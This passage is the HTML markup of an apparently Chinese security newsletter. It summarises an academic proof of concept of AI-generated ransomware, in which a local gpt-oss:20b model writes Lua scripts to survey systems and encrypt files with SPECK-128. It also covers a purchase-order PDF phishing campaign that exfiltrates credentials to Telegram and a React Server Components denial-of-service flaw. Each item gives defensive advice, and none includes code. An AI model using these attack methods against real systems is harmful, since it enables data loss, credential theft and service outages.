0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">04</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">首个AI勒索软件借gpt-oss:20b动态生成Lua脚本，可能引发数据不可访问、业务中断风险</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jfbe92df"><span leaf="">攻击方式关键词：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">系统信息探测（T1082）、文件和目录发现（T1083）、恶意代码生成（T1036.005）、数据加密（T1486）、防御规避（T1562）、自动化攻击（T1589.001）、跨平台工具滥用（T1614.001）、脚本执行（T1059.001）、本地大模型滥用（T1538.008）、权限获取（T1078）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8jfbe912l2" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">情报来源：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.anquanke.com/post/id/312173" target="_blank">https://www.anquanke.com/post/id/312173</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jfbe9u5k" style="font-size: 14px;">首个 “AI 驱动勒索软件” 概念验证由学术团队主导研发，基于开源工具、商业硬件及少量 GPU 实现，通过本地部署大模型动态生成恶意 Lua 代码发起攻击。其采用全新自动化攻击链，先向本地大模型下发限定格式请求，生成跨平台 Lua 脚本采集系统关键信息（含系统、用户名等，探测失败返回默认值），再通过脚本递归遍历文件系统（跳过隐藏文件与无权限目录），根据反馈指令抉择加密、窃取或毁灭操作。加密时调用 SPECK-128 算法对目标文件逐块加密覆盖，全程通过模型交互、循环验证修正构成全自动化攻击流程，动态生成与即时反馈机制提升隐蔽性和规避检测能力。该攻击可能导致文件加密、数据不可访问、业务中断，增加响应与修复难度。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jfbe9191w" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigjhckvru" style="font-size: 14px;">加强跨平台 Lua 代码及大模型交互监控，检测异常文件操作，更新安全补丁，严格管控本地大模型接口，利用行为分析识别异常请求。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigs0671rar"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, &#34;PingFang SC&#34;;font-weight: bold;color: rgb(0, 0, 0);line-height: 22px;text-align: left;" data-mid=""><span leaf="" mpa-font-style="md8m9c40qpa" style="font-size: 32px;" data-mpa-action-id="md8m9c51feg" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">05</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">伪装“NEW Purchase Order”PDF附件实施钓鱼攻击，网站及隐藏脚本窃取企业关键数据</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jgv1e12ce"><span leaf="">攻击方式关键词：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">用户执行（T1204）、钓鱼（T1566）、凭证窃取（T1071）、数据窃取（T1071）、反分析（T1071）、获取基础设施（T1583）</span></span></p></li><li><p><span mpa-font-style="md8jgv1e17rl" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">情报来源：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.malwarebytes.com/blog/threat-intel/2025/12/inside-a-purchase-order-pdf-phishing-campaign" target="_blank">https://www.malwarebytes.com/blog/threat-intel/2025/12/inside-a-purchase-order-pdf-phishing-campaign</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jgv1ev8f" style="font-size: 14px;">本文分析了一起利用伪装成采购订单PDF的钓鱼攻击活动。攻击者设计了一封看似正规、专业的邮件，诱使受害者点击附件中的链接，访问钓鱼网页。邮件附件包含的PDF文件表面显示一个按钮，实际上该按钮隐藏了一个长链接，指向一个伪造的登录页面。登录表单预填受害者的企业邮箱地址，目的是窃取邮箱账号和密码。钓鱼页面采集用户凭证后，还通过ipapi服务获取了浏览器类型、操作系统、语言、cookies和屏幕分辨率等设备信息，并通过POST请求将数据发送到攻击者的Telegram聊天账户。为避免被检测，攻击者采用了多层代码混淆技术，隐藏关键数据采集功能。钓鱼网站托管在知名云平台下的子域名，增加了其初期的可信度，便于快速更换钓鱼网址。此次攻击可能导致企业邮箱账号、密码和设备信息泄露，进而使攻击者能够入侵企业网络或将信息出售给其他犯罪分子，带来严重安全风险。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jgv1e1i81" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigs05r1tnb" style="font-size: 14px;">在接收含附件邮件时确认发件人身份，避免直接点击未知链接，并启用实时防护系统和多因素认证来降低钓鱼风险。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, &#34;PingFang SC&#34;;font-weight: bold;color: rgb(34, 44, 255);line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px rgb(34, 44, 255);text-align: left;" data-mid=""><span leaf="">03</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8incu1uzj" style="font-size: 20px;" data-mpa-action-id="md8incuv1bwi" data-pm-slice="0 0 []">重点漏洞情报</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m951ldxp" style="font-size: 32px;" data-mpa-action-id="md8m952lbd3" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">React Server Components 拒绝服务漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-67779）</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 169, 0);">高危</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: left;"><span leaf=""><a href="https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components" target="_blank">https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">React Server Components 中针对 CVE-2025-55184 的修复并不完整，在特定情况下无法阻止拒绝服务攻击。受影响的 React Server Components 版本包括19.0.0、19.0.1、19.0.2、19.1.0、19.1.1、19.1.2、19.1.3、19.2.0、19.2.1 、19.2.2，允许对发送到服务器函数端点的 HTTP 请求的有效负载进行不安全的反序列化。这可能导致无限循环，使服务器进程挂起，并可能阻止后续 HTTP 请求的响应。</span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" 